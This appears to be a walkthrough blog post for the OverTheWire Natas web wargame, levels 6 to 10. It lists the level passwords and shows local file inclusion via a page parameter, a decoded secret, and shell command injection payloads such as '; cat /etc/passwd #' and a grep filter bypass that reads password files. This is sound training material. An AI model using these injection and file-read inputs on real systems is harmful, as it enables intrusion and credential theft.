Home Natas: Level 6 - 10
Post
Cancel

Natas: Level 6 - 10

Natas6

Username: natas6

Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Url: http://natas6.natas.labs.overthewire.org/

By viewing the page we see a simple text field

submiting anything to the field gives a Wrong secret message

There is a view source link as well, lets check the source code

This is the php code we get from the source code

Here we see that it checks our POST parameter secret with the variable $secret, also it includes a page from includes/secret.inc. The $secret variable must be from there. We can navigate to the includes/secret.inc and see if we can view its source.

And we get the secret: FOEIUWGHFEEUHOFUOIU

Inputing this secret gets us the password for natas7


Natas7

Username: natas7

Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Url: http://natas7.natas.labs.overthewire.org/

Here we have a simple page with two links. By clicking one of the links we notices it fetches the page with the GET parameter page. Test for LFI here by changing the parameter to /etc/passwd

As we can see below we have Local File Inclusion. Now lets try and find a file that conatains the password to natas8

We can note from the home page of the Natas web challenges

all passwords are stored in /etc/natas_webpass/natasX

So we can assume that the natas7 challenge is running as natas7 and we can read natas8

url: /index.php?page=/etc/natas_webpass/natas8


Natas8

Username: natas8

Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Url: http://natas8.natas.labs.overthewire.org/

We notice that this site looks alot like natas6, lets check the source code again

Looks like the secret is encrypted. The web server will take our input, encrypt it with the encodedSecret function and then check if it is equal to the $encodedSecret variable.

First is will base64 encode -> Reverse string -> Convert to hex

Let do the opposite to the string we already have

Convert from hex -> reverse string -> base64 decode

Ill be using a tool called cyber chef to do this (https://gchq.github.io/CyberChef/)

And we get our secret

By submiting oubWYf2kBq we get the password for natas9


Natas9

Username: natas9

Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Url: http://natas9.natas.labs.overthewire.org/

By viewing the page we get an input box and a view source code link

By submiting anything it looks like it searches for the word and print the output, lets look at the source code

As we can see from the php code it takes our input and uses the passthru function to grep the dictionary.txt file.

By reading online we understand that the passthru function performs OS commands, our $key variable is not sanitized meaning we can injection malicious commands.

grep -i $key dictionary.txt

We can end a command and add more commands in one line in bash with the ;

We can also comment bash code with a #

if we inject a command like: ; cat /etc/passwd # we should exeute the cat /etc/passwd command and view the /etc/passwd file:

bingo, we have command execution, lets try and read the natas10 password file with: ; cat /etc/natas_webpass/natas10 #


Natas10

Username: natas10

Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Url: http://natas10.natas.labs.overthewire.org/

We get the same challenge as before, but now it states that they filter the key we supply. Lets check the source code

As we can see it checks that our input does not conatain ;,| or &. So we can not use the same code injection bypass as we did before, as the ; is not allowed. But the # is still allowed, meaning me can remove the dictionary.txt from the grep command as we did before and supply our own file to read from.

What if we supplied the /etc/natas_webpass/natas11 file? since we know that grep will print the whole line if it contains as least one char that matches.

Lets try a /etc/natas_webpass/natas11 # -> nope

b /etc/natas_webpass/natas11 # -> nope

c /etc/natas_webpass/natas11 # -> bingo

We get the password for natas11

This post is licensed under CC BY 4.0 by the author.